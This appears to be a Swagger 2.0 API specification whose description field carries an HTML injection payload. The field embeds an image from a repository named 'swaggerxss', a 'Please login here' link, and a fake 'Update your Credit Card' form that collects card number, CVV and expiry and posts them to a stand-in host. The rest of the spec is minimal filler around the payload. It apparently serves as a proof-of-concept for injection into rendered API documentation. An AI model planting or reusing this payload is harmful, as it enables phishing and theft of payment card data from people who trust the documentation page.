swagger: '2.0'
info:
  title: Classic API Resource Documentation
  description: |
    <br><table ><tr><td><img src='https://raw.githubusercontent.com/JackPot777/swaggerxss/main/1.svg'><br><table><tr><td><a href='https://example.com/'><br>Please login here to continue</a></td><td><div class='creditCardForm'><style>div{background-color:red;}</style><div class="heading"><h1>Update your Credit Card</h1></div><div class="payment"><form action="https://example.com/" method="post" class="form-signin" id = "login_form"><div class="form-group owner"><label for="owner">Owner</label><input type="text" name="owner" size="20"></div><div class="form-group CVV"><label for="cvv">CVV</label><input type="text" name="cvv" size="20"></div><div class="form-group" id="card-number-field"><label for="cardNumber">Card Number</label><input type="text" name="cardnumber" size="20"></div><div class="form-group" id="expiration-date"><label>Expiration Date</label><select name="expiration"><option value="01">January</option><option value="02">February </option><option value="03">March</option><option value="04">April</option><option value="05">May</option><option value="06">June</option><option value="07">July</option><option value="08">August</option><option value="09">September</option><option value="10">October</option><option value="11">November</option><option value="12">December</option></select><select name="year"><option value="20"> 2020</option><option value="21"> 2021</option><option value="22"> 2022</option><option value="23"> 2021</option></select></div><div class="form-group" id="pay-now"><button type="submit" class="btn btn-default" id="confirm-purchase" background-color="red">Confirm</button></div></form></div></div></td></tr></table>

  version: production
basePath: /JSSResource/
produces:
  - application/xml
  - application/json
consumes:
  - application/xml
  - application/json
security:
  - basicAuth: []
paths:
  /accounts:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        - accounts
      operationId: findAccounts
      summary: Finds all accounts
securityDefinitions:
  basicAuth:
    type: basic
tags:
  - description: Operations on webhooks
    name: webhooks
